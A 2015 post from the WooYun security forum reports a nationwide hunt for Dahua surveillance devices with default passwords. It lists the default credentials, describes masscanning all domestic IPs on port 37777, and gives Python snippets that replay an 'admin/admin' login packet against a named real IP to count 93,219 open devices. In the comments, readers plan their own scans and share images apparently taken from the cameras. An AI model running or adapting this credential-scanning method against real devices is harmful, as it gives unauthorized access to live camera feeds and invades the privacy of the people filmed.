当前位置:WooYun(白帽子技术社区) >> 乌云电视台 >> 大华监控设备弱口令安全问题统计报告(标题要高大上)

大华监控设备弱口令安全问题统计报告(标题要高大上)

北京方便面 | 2015-08-26 19:09

先看这里
大量浙江大华监控设备弱口令漏洞
WooYun: 大量浙江大华监控设备弱口令漏洞
大华监控设备默认是开启HTTP端口80和TCP端口37777

设备默认弱口令
user:admin pass:admin 管理权限
user:default pass:user 用户默认登陆帐号
user:888888 pass:admin
user:666666 pass:user

一、初步筛选出开放37777端口的ip
借用小伙伴的vps扫描了国内全部ip的37777端口,使用masscan半个小时扫描完成,服务器的发包速度能够达到 180kpps吧,最后得到的结果开放37777端口的ip共计60万多(652488)。
二、扫描存在漏洞的ip
得到了开放37777端口的ip列表,我们需要写个脚本去批量扫描获取存在漏洞的ip,想到的方式是利用socket模拟登陆,根据返回包判断是否存在漏洞。
1、抓取正常登陆包
代码片段
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
    sock.bind(('192.168.1.90',37777))  
    sock.listen(5)
    while True:  
        connection,address = sock.accept()  
        try:  
            connection.settimeout(5)  
            buf = connection.recv(1024)
            f=open("37777data.txt",'a')
            f.write(buf)
            f.close()

2、socket简单模拟正常登陆并判断返回包
代码片段
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect(('58.246.234.102',37777))
    time.sleep(2)
    #send_buf = open('37777data.txt', 'rb').read()
    ##print binascii.b2a_hex(send_buf)
    send_buf = ('\xa0\x00\x00\x60\x00\x00\x00\x00\x61\x64\x6d\x69\x6e\x00\x00\x00\x61\x64\x6d\x69\x6e\x00\x00\x00\x04\x01\x00\x00\x00\x00\xa1\xaa')
    sock.send(send_buf)

(数据要binascii.b2a_hex编码一下才好做对比)

脚本写好,同样是放在小伙伴的vps上,妈蛋(´Д`),耗时19个小时,93219个ip。

结果图形化:
屏幕快照 2015-08-26 下午5.55.33.png
全国大华摄像头漏洞分布.png
其他:屏幕快照 2015-08-26 下午6.19.03.png
屏幕快照 2015-08-26 下午6.25.48.png
屏幕快照 2015-08-26 下午6.34.12.png
屏幕快照 2015-08-26 下午7.03.03.png

分享到:
  1. 1#
    回复此人 感谢
    有归于无 | 2015-08-26 19:11

    加入扫描器

  2. 2#
    回复此人 感谢
    (❤) | 2015-08-26 19:13

    扫一段试试去.

  3. 3#
    回复此人 感谢
    子非海绵宝宝 (呵呵) | 2015-08-26 19:17

    不过还好都是公共场所

  4. 4#
    回复此人 感谢
    conqu3r (http://conqu3.paxmac.org/) | 2015-08-26 19:26

    很有意思

  5. 5#
    回复此人 感谢
    一只猿 (专注无线电与硬件安全) | 2015-08-26 19:42

    180kpps这VPS不错

  6. 6#
    回复此人 感谢
    YY-2012 (#)<alert("dandan")>(#) | 2015-08-26 19:43

    www.wooyun.org/bugs/wooyun-2015-0117068
    不说话

  7. 7# 感谢(1)
    回复此人 感谢
    提莫 | 2015-08-26 21:24

    0901005726972e8f4b4559f27e89dc5f1d3ca1e6.png
    09010205b697a33c5aa260a375c5ce20d6320a33.png
    0901024581f71660f354eb6756ed8b4361e7c094.png
    印象最深的是这几张,哈哈

  8. 8#
    回复此人 感谢
    0749orz (你们城里人真会玩) | 2015-08-26 21:30

    @提莫 6666

  9. 9#
    回复此人 感谢
    0749orz (你们城里人真会玩) | 2015-08-26 21:33

    http://zone.wooyun.org/content/22499

  10. 10#
    回复此人 感谢
    浮萍 | 2015-08-26 21:34

    66666

  11. 11# 感谢(1)
    回复此人 感谢
    提莫 | 2015-08-26 21:40

    @0749orz 我擦嘞 太劲爆了

  12. 12#
    回复此人 感谢
    小表哥 | 2015-08-26 22:12

    @一只猿 这种脏活累活都拿黑服干的,楼主委婉的说的。

  13. 13#
    回复此人 感谢
    小表哥 | 2015-08-26 22:14

    @提莫 晚上开了红外的不能看,跟鬼片一样,尤其是他们那种特殊的压缩算法,本来没人,莫名的抖动一下。。。

  14. 14#
    回复此人 感谢
    隐形人真忙 (foobar) | 2015-08-26 22:39

    19个小时。。。。。速度太慢了   可以开辟两个线程  一个收一个发

  15. 15#
    回复此人 感谢
    一只猿 (专注无线电与硬件安全) | 2015-08-26 23:06

    @小表哥 我的渣渣笔记本才到3kpps前段时间也在做卤煮类似的工作,断断续续的搞了心累,笔记本太慢了

  16. 16#
    回复此人 感谢
    zeracker (多乌云、多机会!!! 微信公众号:301在路上) | 2015-08-26 23:56

    NB。

  17. 17#
    回复此人 感谢
    redrain有节操 (快来和我滚床单) | 2015-08-27 00:02

    4个月前我早已在微博说过这个问题,并对全国进行了统计
    螢幕快照 2015-08-27 上午12.01.56.png

    还有更早的@Z-0ne 早在3月就做了完整的报告和全球统计
    http://plcscan.org/blog/2015/03/china-zhejiangdahua-dvr-dvs-global-census-report/

  18. 18#
    回复此人 感谢
    小表哥 | 2015-08-27 00:20

    @一只猿 自己电脑搞的确心累啊,而且心疼本子啊,没弄个服务器么?vps也行啊,租的话一些vps价格都直逼自己电脑电费了。

  19. 19#
    回复此人 感谢
    ziwen (我是个坏人:-D) | 2015-08-27 01:05

    lz用的结果图形化库是?

  20. 20# 感谢(2)
    回复此人 感谢
    Focusstart | 2015-08-27 09:48

    犀利啊!

  21. 21# 感谢(1)
    回复此人 感谢
    Focusstart | 2015-08-27 09:49

    全国漏洞分布图,怎么画的。

  22. 22#
    回复此人 感谢
    围剿 (七月流火,八月未央,九月白露凝成轻霜) | 2015-08-27 15:33

    good job

  23. 23#
    回复此人 感谢
    Jn· (小学生一枚,不服你TM别打我.) | 2015-08-27 17:12

    @提莫 +1

  24. 24#
    回复此人 感谢
    flywin | 2015-08-27 22:55

    @一只猿 赶紧整

  25. 25#
    回复此人 感谢
    Finger (Save water. Shower with your girlfriend.) | 2015-08-31 12:07

    其实可以将各种不同品牌的问题整合做一个摄像头的报告

  26. 26#
    回复此人 感谢
    Sct7p (.)V(.) (.)_(.) (.)*(.) (.)^(.) (|)(and 1=2)(|) (.)^(.) (.)*(.) (.)_(.) (.)V(.) | 2015-08-31 19:44

    然并卵,这些都是公共安全的监控,不会涉及隐私,只是好奇这种监控为什么会接到互联网!

  27. 27#
    回复此人 感谢
    大漠長河 (专注智能家居与硬件防火墙) | 2015-10-23 14:02

    这问题我问过经销商,经销商说默认密码不可修改。。。

添加新回复

登录 后才能参与评论.

WooYun(白帽子技术社区)

网络安全资讯、讨论,跨站师,渗透师,结界师聚集之地

登录